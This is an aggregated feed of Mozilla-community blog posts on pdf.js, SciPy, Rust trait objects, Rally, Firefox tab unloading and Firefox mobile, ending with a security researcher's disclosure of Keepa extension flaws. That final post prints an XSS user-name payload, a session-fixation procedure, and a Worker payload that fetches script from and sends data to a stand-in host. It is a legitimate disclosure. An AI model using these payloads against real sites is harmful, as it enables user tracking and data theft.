Despite these shortcomings, reftests are a very powerful regression prevention weapon in the pdf.js arsenal. The large number of reftests we have boosts our confidence when applying changes.

Conclusion

Support for AcroForms landed in Firefox v84. JavaScript execution in v88. Tagged PDFs in v89. XFA forms in v93 (tomorrow, October 5th, 2021!).

While all of these features have greatly improved form usability and accessibility, there are still more features we’d like to add. If you’re interested in helping, we’re always looking for more contributors and you can join us on element or github.

We also want to say a big thanks to two of our contributors Jonas Jenwald and Tim van der Meij for their on going help with the above projects.

The post Implementing form filling and accessibility in the Firefox PDF viewer appeared first on Mozilla Hacks - the Web developer blog.

Marco CastelluccioImplementing form filling and accessibility in the Firefox PDF viewer

Data@MozillaMy first time experience at the SciPy conference

In July 2021, I and a few fellow Mozillians attended the SciPy conference with Mozilla as a diversity sponsor, meaning that our sponsorship went towards paying the stipend for the diversity speaker, Tess Tannenbaum. This was my first time attending a SciPy conference and also my first time supporting data science recruiting efforts at a conference.  The conference involved the showcasing of the latest open source Python projects for advancement in scientific computing.  I was eager to meet the contributors of many commonly used data science Python packages and hear about new features in upcoming releases. I was excited about having this opportunity as I strongly believe that conference attendance is an extremely rewarding experience for networking and learning about industry trends.  As a Data Scientist, my day to day work often involves using Python libraries such as scikit-learn, numpy and pandas to derive insights from data.  It felt particularly close to heart for a technical and data science geek like me to learn about code developments and use cases from other enthusiasts in the industry.

One talk that I particularly enjoyed was on the topic of Time-to-Event Modeling in Python led by Brian Kent and a few other data science experts.  Time-to-Event Modeling is also referred to as survival analysis, which was traditionally used in biological research studies to predict lifespans. The speakers at the talk were the contributors of some of the most popular survival analysis python packages.  For example, Lifelines is an introductory Python package that can be used for starters in survival analysis.  Scikit-Survival is another package built on top of Scikit-learn, which is a commonly used package in machine learning.  The focus of the talk was around how survival analysis could be useful in many different scenarios, such as in customer analytics.  There is also increasing usage of survival analysis in SaaS businesses where it can be used to predict customer churn, which can help companies plan their retention strategies.  I am curious how Mozilla can potentially apply survival analysis in ways that also respects data governance guidelines.

Like many other large group events that happened in the past year, the conference was entirely virtual and utilized various platforms to host talks and engagement activities.  In addition to having Slack as a communication tool, the conference also used Airmeet and Gather town this year.  The various sessions, tutorials and recruiting booths were hosted in Airmeet.  The more interactive talks took place in Gather town, which I find quite entertaining and enjoyable.  It is a game-like environment where everyone has a character that can walk around in the virtual environment.  It allows you to network or meet with others by walking up to other characters and their video cameras would show up as you walk towards them.  Conference organizers did a great job quickly adapting to hosting virtual gatherings and coordinating multiple tools to deliver a seamless experience.

When the SciPy conference happens next year in 2022, I will dedicate more time for networking and attending more tutorials.  This will ideally be the likely outcome with the hope that I can attend the conference in person next year.  I am also hopeful that it can be a potential opportunity to meet some remote colleagues from Mozilla in person.  Overall, the conference experience was definitely rewarding as it is important to stay current with new developments and collaborate with other technical enthusiasts in the rapidly changing scientific computing industry.

 

Resources:

Mozillians sharing the 2021 SciPy Conference experience:

SciPy 2021 conference proceedings

SciPy 2021 YouTube Channel

Niko MatsakisDyn async traits, part 3

In the previous “dyn async traits” posts, I talked about how we can think about the compiler as synthesizing an impl that performed the dynamic dispatch. In this post, I wanted to start explore a theoretical future in which this impl was written manually by the Rust programmer. This is in part a thought exercise, but it’s also a possible ingredient for a future design: if we could give programmers more control over the “impl Trait for dyn Trait” impl, then we could enable a lot of use cases.

Example

For this post, async fn is kind of a distraction. Let’s just work with a simplified Iterator trait:

trait Iterator {
    type Item;
    fn next(&mut self) -> Option<Self::Item>;
}

As we discussed in the previous post, the compiler today generates an impl that is something like this:

impl<I> Iterator for dyn Iterator<Item = I> {
    type Item = I;
    fn next(&mut self) -> Option<I> {
        type RuntimeType = ();
        let data_pointer: *mut RuntimeType = self as *mut ();
        let vtable: DynMetadata = ptr::metadata(self);
        let fn_pointer: fn(*mut RuntimeType) -> Option<I> =
            __get_next_fn_pointer__(vtable);
        fn_pointer(data)
    }
}

This code draws on the APIs from RFC 2580, along with a healthy dash of “pseduo-code”. Let’s see what it does:

Extracting the data pointer

type RuntimeType = ();
let data_pointer: *mut RuntimeType = self as *mut ();

Here, self is a wide pointer of type &mut dyn Iterator<Item = I>. The rules for as state that casting a wide pointer to a thin pointer drops the metadata1, so we can (ab)use that to get the data pointer. Here I just gave the pointer the type *mut RuntimeType, which is an alias for *mut () — i.e., raw pointer to something. The type alias RuntimeType is meant to signify “whatever type of data we have at runtime”. Using () for this is a hack; the “proper” way to model it would be with an existential type. But since Rust doesn’t have those, and I’m not keen to add them if we don’t have to, we’ll just use this type alias for now.

Extracting the vtable (or DynMetadata)

let vtable: DynMetadata = ptr::metadata(self);

The ptr::metadata function was added in RFC 2580. Its purpose is to extract the “metadata” from a wide pointer. The type of this metadata depends on the type of wide pointer you have: this is determined by the Pointee trait[^noreferent]. For dyn types, the metadata is a DynMetadata, which just means “pointer to the vtable”. In today’s APIs, the DynMetadata is pretty limited: it lets you extract the size/alignment of the underlying RuntimeType, but it doesn’t give any access to the actual function pointers that are inside.

Extracting the function pointer from the vtable

let fn_pointer: fn(*mut RuntimeType) -> Option<I> = 
    __get_next_fn_pointer__(vtable);

Now we get to the pseudocode. Somehow, we need a way to get the fn pointer out from the vtable. At runtime, the way this works is that each method has an assigned offset within the vtable, and you basically do an array lookup; kind of like vtable.methods()[0], where methods() returns a array &[fn()] of function pointers. The problem is that there’s a lot of “dynamic typing” going on here: the signature of each one of those methods is going to be different. Moreover, we’d like some freedom to change how vtables are laid out. For example, the ongoing (and awesome!) work on dyn upcasting by Charles Lew has required modifying our vtable layout, and I expect further modification as we try to support dyn types with multiple traits, like dyn Debug + Display.

So, for now, let’s just leave this as pseudocode. Once we’ve finished walking through the example, I’ll return to this question of how we might model __get_next_fn_pointer__ in a forwards compatible way.

One thing worth pointing out: the type of fn_pointer is a fn(*mut RuntimeType) -> Option<I>. There are two interesting things going on here:

  • The argument has type *mut RuntimeType: using the type alias indicates that this function is known to take a single pointer (in fact, it’s a reference, but those have the same layout). This pointer is expected to point to the same runtime data that self points at — we don’t know what it is, but we know that they’re the same. This works because self paired together a pointer to some data of type RuntimeType along with a vtable of functions that expect RuntimeType references.2
  • The return type is Option<I>, where I is the item type: this is interesting because although we don’t know statically what the Self type is, we do know the Item type. In fact, we will generate a distinct copy of this impl for every kind of item. This allows us to easily pass the return value.

Calling the function

fn_pointer(data)

The final line in the code is very simple: we call the function! It returns an Option<I> and we can return that to our caller.

Returning to the pseudocode

We relied on one piece of pseudocode in that imaginary impl:

let fn_pointer: fn(*mut RuntimeType) -> Option<I> = 
    __get_next_fn_pointer__(vtable);

So how could we possibly turn __get_next_fn_pointer__ from pseudocode into real code? There are two things worth noting:

  • First, the name of this function already encodes the method we want (next). We probably don’t want to generate an infinite family of these “getter” functions.
  • Second, the signature of the function is specific to the method we want, since it returns a fn type(fn *mut RuntimeType) -> Option<I>) that encodes the signature for next (with the self type changed, of course). This seems better than just returning a generic signature like fn() that must be cast manually by the user; less opportunity for error.

Using zero-sized fn types as the basis for an API

One way to solve these problems would be to build on the trait system. Imagine there were a type for every method, let’s call it A, and that this type implemented a trait like AssociatedFn:

trait AssociatedFn {
    // The type of the associated function, but as a `fn` pointer
    // with the self type erased. This is the type that would be
    // encoded in the vtable.
    type FnPointer;

     // maybe other things
}

We could then define a generic “get function pointer” function like so:

fn associated_fn<A>(vtable: DynMetadata) -> A::FnPtr
where
    A: AssociatedFn

Now instead of __get_next_fn_pointer__, we can write

type NextMethodType =  /* type corresponding to the next method */;
let fn_pointer: fn(*mut RuntimeType) -> Option<I> = 
   associated_fn::<NextMethodType>(vtable);

Ah, but what is this NextMethodType? How do we get the type for the next method? Presumably we’d have to introduce some syntax, like Iterator::item.

This idea of a type for associated functions is very close (but not identical) to an already existing concept in Rust: zero-sized function types. As you may know, the type of a Rust function is in fact a special zero-sized type that uniquely identifies the function. There is (presently, anyway) no syntax for this type, but you can observe it by printing out the size of values (playground):

fn foo() { }

// The type of `f` is not `fn()`. It is a special, zero-sized type that uniquely
// identifies `foo`
let f = foo;
println!({}, sizeof_value(&f)); // prints 0

// This type can be coerced to `fn()`, which is a function pointer
let g: fn() = f;
println!({}, sizeof_value(&g)); // prints 8

There are also types for functions that appear in impls. For example, you could get an instance of the type that represents the next method on vec::IntoIter<u32> like so:

let x = <vec::IntoIter<u32> as Iterator>::next;
println!({}, sizeof_value(&f)); // prints 0

Where the zero-sized types don’t fit

The existing zero-sized types can’t be used for our “associated function” type for two reasons:

  • You can’t name them! We can fix this by adding syntax.
  • There is no zero-sized type for a trait function independent of an impl.

The latter point is subtle3. Before, when I talked about getting the type for a function from an impl, you’ll note that I gave a fully qualified function name, which specified the Self type precisely:

let x = <vec::IntoIter<u32> as Iterator>::next;
//       ^^^^^^^^^^^^^^^^^^ the Self type

But what we want in our impl is to write code that doesn’t know what the Self type is! So this type that exists in the Rust type system today isn’t quite what we need. But it’s very close.

Conclusion

I’m going to leave it here. Obviously, I haven’t presented any kind of final design, but we’ve seen a lot of tantalizing ingredients:

  • Today, the compiler generates a impl Iterator for dyn Iterator that extract functions from a vtable and invokes them by magic.
  • But, using the APIs from RFC 2580, you can almost write the by hand. What is missing is a way to extract a function pointer from a vtable, and what makes that hard is that we need a way to identify the function we are extracting
  • We have zero-sized types that represent functions today, but we don’t have a way to name them, and we don’t have zero-sized types for functions in traits, only in impls.

Of course, all of the stuff I wrote here was just about normal functions. We still need to circle back to async functions, which add a few extra wrinkles. Until next time!

Footnotes

  1. I don’t actually like these rules, which have bitten me a few times. I think we should introduce an accessor function, but I didn’t see one in RFC 2580 — maybe I missed it, or it already exists. 

  2. If you used unsafe code to pair up a random pointer with an unrelated vtable, then hilarity would ensue here, as there is no runtime checking that these types line up. 

  3. And, in fact, I didn’t see it until I was writing this blog post! 

Hacks.Mozilla.OrgControl your data for good with Rally

Let’s face it, if you have ever used the internet or signed up for an online account, or even read a blog post like this one, chances are that your data has left a permanent mark on the interwebs and online services have exploited your data without your awareness for a very long time. 

The Fight for Privacy

The fight for privacy is compounded by the rise in misinformation and platforms like Facebook willingly sharing information that is untrustworthy, shutting down platforms like Crowdtangle and recently terminating the accounts of New York University researchers that built Ad Observer, an extension dedicated to bringing greater transparency to political advertising. We think a better internet is one where people have more control over their data. 

Contribute your data for good

In a world where data and AI are reshaping society, people currently have no tangible way to put their data to work for the causes they believe in. To address this, we built the Rally platform, a first-of-its-kind tool that enables you to contribute your data to specific studies and exercise consent at a granular level. Mozilla Rally puts you in control of your data while building a better Internet and a better society. 

Mozilla Rally

Like Mozilla, Rally is a community-driven open source project and we publish our code on GitHub, ensuring that it’s open-source and freely available for you to audit. Privacy, control and transparency are foundational to Rally. Participating is voluntary, meaning we won’t collect data unless you agree to it first, and we’ll provide you with a clear understanding of what we have access to at every step of the way.

 

With your help, we can create a safer, more transparent, and more equitable internet that protects people, not Big Tech. 

Interested?

Rally needs users and is currently available on Firefox. In the future, we will expand to other web browsers. We’re currently looking for users who are residents in the United States, age 19 and older. 

Protecting the internet and its users is hard work!  We’re also hiring to grow our Rally Team.

 

The post Control your data for good with Rally appeared first on Mozilla Hacks - the Web developer blog.

Support.Mozilla.OrgIntroducing Abby Parise

Hi folks,

It’s with great pleasure that I introduce Abby Parise, who is the latest addition to the Customer Experience team. Abby is taking the role of Support Content Manager, so you’ll definitely see more of her in SUMO. If you were with us or have watched September’s community call, you might’ve seen her there.

Here’s a brief introduction from Abby:

Hi there! My name is Abby and I’m the new Support Content Manager for Mozilla. I’m a longtime Firefox user with a passion for writing compelling content to help users achieve their goals. I’m looking forward to getting to know our contributors and would love to hear form you on ideas to make our content more helpful and user-friendly!

Please join me to welcome Abby!

This Week In RustThis Week in Rust 411

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Project/Tooling Updates
Research and Papers
Newsletters
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is pubgrub, a Rust implementation of the state of the art version solving algorithm.

Thanks to Louis Pilfold for the suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

ockam

jsonschema-rs

Updates from the Rust Project

266 pull requests were merged in the last week

Rust Compiler Performance Triage

A fairly busy week, with a relatively high percentage of PRs landing with regressions and improvements. The overall trajectory is fairly neutral for this week though.

Triage done by @simulacrum. Revision range: 83f147b..25ec82

5 Regressions, 5 Improvements, 5 Mixed; 1 of them in rollups

43 comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs
New RFCs

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Grafbase

Jigzi

pganalyze

Oso

Kraken

Subspace Labs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

There's a common trope among people unfamiliar with rust where they assume that if you use unsafe at all, then it's just as unsafe as C and rust provided no benefit. Comparing C's approach to safety vs Rust's is like comparing an open world assumption to a closed world assumption in formal logic systems. In C, you publish your api if it's possible to use correctly (open world). In Rust, you publish a safe api if it's im possible to use in correctly (closed world). Rust's key innovation here is that it enables you to build a 'bridge' from open world (unsafe) to a closed world (safe), a seemingly impossible feat that feels like somehow pairwise reducing an uncountable infinity with a countable infinity. Rust's decision to design an analogous closed-world assumption for safe code is extremely powerful, but it seems very hard for old school C programmers to wrap their head around it.

/u/infogulch on /r/rust

Thanks to Alice Ryhl for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Hacks.Mozilla.OrgTab Unloading in Firefox 93

Starting with Firefox 93, Firefox will monitor available system memory and, should it ever become so critically low that a crash is imminent, Firefox will respond by unloading memory-heavy but not actively used tabs. This feature is currently enabled on Windows and will be deployed later for macOS and Linux as well. When a tab is unloaded, the tab remains in the tab bar and will be automatically reloaded when it is next selected. The tab’s scroll position and form data are restored just like when the browser is restarted with the restore previous windows browser option.

On Windows, out-of-memory (OOM) situations are responsible for a significant number of the browser and content process crashes reported by our users. Unloading tabs allows Firefox to save memory leading to fewer crashes and avoids the associated interruption in using the browser.

We believe this may especially benefit people who are doing heavy browsing work with many tabs on resource-constrained machines. Or perhaps those users simply trying to play a memory-intensive game or using a website that goes a little crazy. And of course, there are the tab hoarders, (no judgement here). Firefox is now better at surviving these situations.

We have experimented with tab unloading on Windows in the past, but a problem we could not get past was that finding a balance between decreasing the browser’s memory usage and annoying the user because there’s a slight delay as the tab gets reloaded, is a rather difficult exercise, and we never got satisfactory results.

We have now approached the problem again by refining our low-memory detection and tab selection algorithm and narrowing the action to the case where we are sure we’re providing a user benefit: if the browser is about to crash. Recently we have been conducting an experiment on our Nightly channel to monitor how tab unloading affects browser use and the number of crashes our users encounter. We’ve seen encouraging results with that experiment. We’ll continue to monitor the results as the feature ships in Firefox 93.

With our experiment on the Nightly channel, we hoped to see a decrease in the number of OOM crashes hit by our users. However, after the month-long experiment, we found an overall significant decrease in browser crashes and content process crashes. Of those remaining crashes, we saw an increase in OOM crashes. Most encouragingly, people who had tab unloading enabled were able to use the browser for longer periods of time. We also found that average memory usage of the browser increased.

The latter may seem very counter-intuitive, but is easily explained by survivorship bias. Much like in the archetypal example of the Allied WWII bombers with bullet holes, browser sessions that had such high memory usage would have crashed and burned in the past, but are now able to survive by unloading tabs just before hitting the critical threshold.

The increase in OOM crashes, also very counter-intuitive, is harder to explain. Before tab unloading was introduced, Firefox already responded to Windows memory-pressure by triggering an internal memory-pressure event, allowing subsystems to reduce their memory use. With tab unloading, this event is fired after all possible unloadable tabs have been unloaded.

This may account for the difference. Another hypothesis is that it’s possible our tab unloading sometimes kicks in a fraction too late and finds the tabs in a state where they can’t even be safely unloaded any more.

For example, unloading a tab requires a garbage collection pass over its JavaScript heap. This needs some additional temporary storage that is not available, leading to the tab crashing instead of being unloaded but still saving the entire browser from going down.

We’re working on improving our understanding of this problem and the relevant heuristics. But given the clearly improved outcomes for users, we felt there was no point in holding back the feature.

When does Firefox automatically unload tabs?

When system memory is critically low, Firefox will begin automatically unloading tabs. Unloading tabs could disturb users’ browsing sessions so the approach aims to unload tabs only when necessary to avoid crashes. On Windows, Firefox gets a notification from the operating system (setup using CreateMemoryResourceNotification) indicating that the available physical memory is running low. The threshold for low physical memory is not documented, but appears to be around 6%. Once that occurs, Firefox starts periodically checking the commit space (MEMORYSTATUSEX.ullAvailPageFile).

When the commit space reaches a low-memory threshold, which is defined with the preference “browser.low_commit_space_threshold_mb”, Firefox will unload one tab, or if there are no unloadable tabs, trigger the Firefox-internal memory-pressure warning allowing subsystems in the browser to reduce their memory use. The browser then waits for a short period of time before checking commit space again and then repeating this process until available commit space is above the threshold.

We found the checks on commit space to be essential for predicting when a real out-of-memory situation is happening. As long as there is still swap AND physical memory available, there is no problem. If we run out of physical memory and there is swap, performance will crater due to paging, but we won’t crash.

On Windows, allocations fail and applications will crash if there is low commit space in the system even though there is physical memory available because Windows does not overcommit memory and can refuse to allocate virtual memory to the process in this case. In other words, unlike Linux, Windows always requires commit space to allocate memory.

How do we end up in this situation? If some applications allocate memory but do not touch it, Windows does not assign the physical memory to such untouched memory. We have observed graphics drivers doing this, leading to low swap space when plenty of physical memory is available.

In addition, crash data we collected indicated that a surprising number of users with beefy machines were in this situation, some perhaps thinking that because they had a lot of memory in their machine, the Windows swap could be reduced to the bare minimum. You can see why this is not a good idea!

How does Firefox choose which tabs to unload first?

Ideally, only tabs that are no longer needed will be unloaded and the user will eventually restart the browser or close unloaded tabs before ever reloading them. A natural metric is to consider when the user has last used a tab. Firefox unloads tabs in least-recently-used order.

Tabs playing sound, using picture-in-picture, pinned tabs, or tabs using WebRTC (which is used for video and audio conferencing sites) are weighted more heavily so they are less likely to be unloaded. Tabs in the foreground are never unloaded. We plan to do more experiments and continue to tune the algorithm, aiming to reduce crashes while maintaining performance and being unobtrusive to the user.

about:unloads

For diagnostic and testing purposes, a new page about:unloads has been added to display the tabs in their unload-priority-order and to manually trigger tab unloading. This feature is currently in beta and will ship with Firefox 94.

Screenshot of the about:unloads page in beta planned for Firefox 94.

Screenshot of the about:unloads page in beta planned for Firefox 94.

Browser Extensions

Some browser extensions already offer users the ability to unload tabs. We expect these extensions to interoperate with automatic tab unloading as they use the same underlying tabs.discard() API. Although it may change in the future, today automatic tab unloading only occurs when system memory is critically low, which is a low-level system metric that is not exposed by the WebExtensions API. (Note: an extension could use the native messaging support in the WebExtensions API to accomplish this with a separate application.) Users will still be able to benefit from tab unloading extensions and those extensions may offer more control over when tabs are unloaded, or deploy more aggressive heuristics to save more memory.

Let us know how it works for you by leaving feedback on ideas.mozilla.org or reporting a bug. For support, visit support.mozilla.org.Firefox crash reporting and telemetry adheres to our data privacy principles. See the Mozilla Privacy Policy for more information.

Thanks to Gian-Carlo Pascutto, Toshihito Kikuchi, Gabriele Svelto, Neil Deakin, Kris Wright, and Chris Peterson, for their contributions to this blog post and their work on developing tab unloading in Firefox.

The post Tab Unloading in Firefox 93 appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla BlogNews from Firefox Focus and Firefox on Mobile

One of our promises this year was to deliver ways that can help you navigate the web easily and get you quickly where you need to go. We took a giant step in that direction earlier this year when we shared a new Firefox experience. We were on a mission to save you time and streamline your everyday use of the browser. This month, we continue to deliver on that mission with new features in our Firefox on mobile products. For our Firefox Focus mobile users, we have a fresh redesign plus new features including shortcuts to get you faster to the things you want to get to. This Cybersecurity Awareness month, you can manage your passwords and take them wherever you go whenever you use your Firefox on Android mobile app. 

Fresh, new Firefox Focus 

Since its launch, Firefox Focus has been a favorite app with its minimal design, streamlined features and for those times when you want to do a super quick search without the distractions. So, when it came to refreshing Firefox Focus we wanted to offer a simple, privacy by default companion app, allowing users to quickly complete searches without distraction and worry of being tracked or bombarded with advertisements. We added a fresh new look with new colors, a new logo and a dark theme. We added a shortcut feature so that users can get to the sites they visit the most. And with privacy in mind you will see the privacy Tracking Protection Shield icon which is accessible from the search bar so you can quickly turn the individual trackers on or off when you click the shield icon. Plus, we added a global counter that shows you all the trackers blocked for you. Check out the new Firefox Focus and try it for life’s “get in and get out” moments. 

<figcaption>New shortcut feature to get you to the sites you visit most</figcaption>

Got a ton of passwords? Keep them safe on Firefox on Android

What do Superman, Black Widow and Wolverine have in common? They make horrible passwords. At least that’s what we discovered when we took a look to see how fortified superhero passwords are in the fight against hackers and breaches. You can see how your favorite superheroes fared in “Superhero passwords may be your kryptonite wherever you go online.”  

This Cybersecurity Awareness month, we added new features on Firefox on Android, to keep your passwords safe. We’ve increasingly become dependent on the web, whether it’s signing up for streaming services or finding new ways to connect with families and friends, we’ve all had to open an account and assign a completely new password. Whether it’s 10 or 100 passwords, you can take your passwords wherever you go on Firefox on Android. These new features will be available on iOS later this year. The new features include:

Creating and adding new passwords is easy – Now, when you create an account for any app on your mobile device, you can also create and add a new password, which you can save directly in the Firefox browser and you can use it on both mobile and desktop.  

<figcaption>Create and add new passwords</figcaption>

  • Take your passwords with you on the go – Now you can easily autofill your password on your phone and use any password you’ve saved in the browser to log into any online account like your Twitter or Instagram app. No need to open a web page. Plus, if you have a Firefox account then you can sync all your passwords across desktop and mobile devices. It’s that seamless and simple. 
<figcaption>Sync all your passwords across desktop and mobile devices</figcaption>

  • Unlock your passwords with your fingerprint or face – Now only you can safely open your accounts when you use your operating system’s biometric security, such as your face or your fingerprint touch to unlock the access page to your logins and passwords.

Firefox coming soon to a Windows store near you

Microsoft has loosened restrictions on its Windows Store that effectively banned third-party browsers from the store. We have been advocating for years for more user choice and control on the Windows operating system. We welcome the news that their store is now more open to companies and applications, including independent browsers like Firefox. We believe that a healthier internet is one where people have an opportunity to choose from a diverse range of browsers and browser engines. Firefox will be available in the Windows store later this year. 

Get the fast, private browser for your desktop and mobileFirefox on Android, Firefox for iOS and Firefox Focus today.

For more on Firefox:

11 secret tips for Firefox that will make you an internet pro

7 things to know (and love) about the new Firefox for Android

Modern, clean new Firefox clears the way to all you need online

Behind the design: A fresh new Firefox

The post News from Firefox Focus and Firefox on Mobile appeared first on The Mozilla Blog.

Wladimir PalantAbusing Keepa Price Tracker to track users on Amazon pages

As we’ve seen before, shopping assistants usually aren’t a good choice of browser add-on if you value either your privacy or security. This impression is further reinforced by Keepa, the Amazon Price Tracker. The good news here: the scope of this extension is limited to Amazon properties. But that’s all the good news there are. I’ve already written about excessive data collection practices in this extension. I also reported two security vulnerabilities to the vendor.

Today we’ll look at a persistent Cross-Site Scripting (XSS) vulnerability in the Keepa Box. This one allowed any attackers to track you across Amazon web properties. The second vulnerability exposed Keepa’s scraping functionality to third parties and could result in data leaks.

Meat grinder with the Keepa logo on its side is working on the Amazon logo, producing lots of prices and stars<figcaption> Image credits: Keepa, palomaironique, Nikon1803 </figcaption>

Persistent XSS vulnerability

What is the Keepa Box?

When you open an Amazon product page, the Keepa extension will automatically inject a frame like https://keepa.com/iframe_addon.html#3-0-B07FCMBLV6 into it. Initially, it shows you a price history for the article, but there is far more functionality here.

Complicated graph showing the price history of an Amazon article, with several knops to tweak the presentation as well as several other options such as logging in.

This page, called the Keepa Box, is mostly independent of the extension. Whether the extension is present or not, it lets you look at the data, log into an account and set alerts. The extension merely assists it by handling some messages, more on that below.

Injecting HTML code

The JavaScript code powering the Keepa Box is based on jQuery, security-wise a very questionable choice of framework. As common with jQuery-based projects, this one will compose HTML code from strings. And it doesn’t bother properly escaping special characters, so there are plenty of potential HTML injection points. For example this one:

html = storage.username ?
          "<span id=\"keepaBoxSettings\">" + storage.username + "</span>" :
          "<span id=\"keepaBoxLogin\">" + la._9 + "</span>";

If the user is logged in, the user name as set in storage.username will be displayed. So a malicious user name like me<img src=x onerror=alert(1)> will inject additional JavaScript code into the page (here displaying a message). While it doesn’t seem possible to change the user name retroactively, it was possible to register an account with a user name like this one.

Now this page is using the Content Security Policy mechanism which could have prevented the attack. But let’s have a look at the script-src directive:

script-src 'self' 'unsafe-inline' https://*.keepa.com https://apis.google.com
    https://*.stripe.com https://*.googleapis.com https://www.google.com/recaptcha/
    https://www.gstatic.com/recaptcha/ https://completion.amazon.com
    https://completion.amazon.co.uk https://completion.amazon.de
    https://completion.amazon.fr https://completion.amazon.co.jp
    https://completion.amazon.ca https://completion.amazon.cn
    https://completion.amazon.it https://completion.amazon.es
    https://completion.amazon.in https://completion.amazon.nl
    https://completion.amazon.com.mx https://completion.amazon.com.au
    https://completion.amazon.com.br;

That’s lots of different websites, some of which might allow circumventing the protection. But the 'unsafe-inline' keyword makes complicated approaches unnecessary, inline scripts are allowed. Already the simple attack above works.

Deploying session fixation

You probably noticed that the attack described above relies on you choosing a malicious user name and logging into that account. So far this is merely so-called Self-XSS: the only person you can attack is yourself. Usually this isn’t considered an exploitable vulnerability.

This changes however if you can automatically log other people into your account. Then you can create a malicious account in advance, after which you make sure your target is logged into it. Typically, this is done via a session fixation attack.

On the Keepa website, the session is determined by a 64 byte alphanumeric token. In the JavaScript code, this token is exposed as storage.token. And the login procedure involves redirecting the user to an address like https://keepa.com/#!r/4ieloesi0duftpa385nhql1hjlo4dcof86aecsr7r8est7288p9ge2m05fvbnoih which will store 4ieloesi0duftpa385nhql1hjlo4dcof86aecsr7r8est7288p9ge2m05fvbnoih as the current session token.

So the complete attack would look like this:

  • Register an account with a malicious user name like me<img src=x onerror=alert(1)>
  • Check the value of storage.token to extract the session token
  • If a Keepa user visits your website, make sure to open https://keepa.com/#!r/<token> in a pop-up window (can be closed immediately afterwards)

Your JavaScript code (here alert(1)) will be injected into each and every Keepa Box of this user now. As the Keepa session is persistent, it will survive browser restarts. And it will even run on the main Keepa website if the user logs out, giving you a chance to prevent them from breaking out of the session fixation.

Keepa addressed this vulnerability by forbidding angled brackets in user names. The application still contains plenty of potentially exploitable HTML injection points, Content Security Policy hasn’t been changed either. The session fixation attack is also still possible.

The impact

The most obvious consequence of this vulnerability: the malicious code can track all Amazon products that the user looks at. And then it can send messages that the Keepa extension will react to. These are mostly unspectacular except for two:

  • ping: retrieves the full address of the Amazon page, providing additional information beyond the mere article ID
  • openPage: opens a Private Browsing / Incognito window with a given page address (seems to be unused by Keepa Box code but can be abused by malicious code nevertheless)

So the main danger here is that some third party will be able to spy on the users whenever they go to Amazon. But for that it needs to inject considerable amounts of code, and it needs to be able to send data back. With user names being at most 100 characters long, and with Keepa using a fairly restrictive Content Security Policy: is it even possible?

Usually, the approach would be to download additional JavaScript code from the attacker’s web server. However, Keepa’s Content Security Policy mentioned above only allows external scripts from a few domains. Any additional scripts still have to be inserted as inline scripts.

Most other Content Security Policy directives are similarly restrictive and don’t allow connections to arbitrary web servers. The only notable exception is worker-src:

worker-src 'self' blob: data: *;

No restrictions here for some reason, so the malicious user name could be something like:

<img
  src=x
  onerror="new Worker('//malicious.example.com').onmessage=e=>document.write(e.data)">

This will create a Web Worker with the script downloaded from malicious.example.com. Same-origin policy won’t prevent it from running if the right CORS headers are set. And then it will wait for HTML code to be sent by the worker script. The HTML code will be added to the document via document.write() and can execute further JavaScript code, this time without any length limits.

The same loophole in the Content Security Policy can be used to send exfiltrated data to an external server: new Worker("//malicious.example.com?" + encodeURLComponent(data)) will be able to send data out.

Data exposure vulnerability

My previous article on Keepa already looked into Keepa’s scraping functionality, in particular how Keepa loads Amazon pages in background to extract data from them. When a page loads, Keepa tells its content script which scraping filters to use. This isn’t done via inherently secure extension communication APIs but rather via window.postMessage(). The handling in the content script essentially looks as follows:

window.addEventListener("message", function (event) {
  if (event.source == window.parent && event.data) {
    var instructions = event.data.value;
    if ("data" == event.data.key && instructions.url == document.location) {
      scrape(instructions, function (scrapeResult) {
        window.parent.postMessage({ sandbox: scrapeResult }, "*");
      });
    }
  }
}, false);

This will accept scraping instructions from the parent frame, regardless of whether the parent frame belongs to the extension or not. The content script will perform the scraping, potentially extracting security tokens or private information, and send the results back to its parent frame.

A malicious website could abuse this by loading a third-party page in a frame, then triggering the scraping functionality to extract arbitrary data from it, something that same-origin policy normally prevents. The catch: the content script is only active on Amazon properties and Keepa’s own website. And luckily most Amazon pages with sensitive data don’t allow framing by third parties.

Keepa’s website on the other hand is lacking such security precautions. So my proof-of-concept page would extract data from the Keepa forum if you were logged into it: your user name, email address, number of messages and whether you are a privileged user. Extracting private messages or any private data available to admins would have been easy as well. All that without any user interaction and without any user-visible effects.

This vulnerability has been addressed in Keepa 3.88 by checking the message origin. Only messages originating from an extension page are accepted now, messages from websites will be ignored.

Conclusions

Keepa’s reliance on jQuery makes it susceptible to XSS vulnerabilities, with the one described above being only one out of many potential vulnerabilities. While the website itself probably isn’t a worthwhile target, persistent XSS vulnerabilities in Keepa Box expose users to tracking by arbitrary websites. This tracking is limited to shopping on Amazon websites but will expose much potentially private information for the typical Keepa user.

Unlike most websites, Keepa deployed a Content Security Policy that isn’t useless. By closing the remaining loopholes, attacks like the one presented here could be made impossible or at least considerably more difficult. To date, the vulnerability has been addressed minimally however and the holes in the Content Security Policy remain.

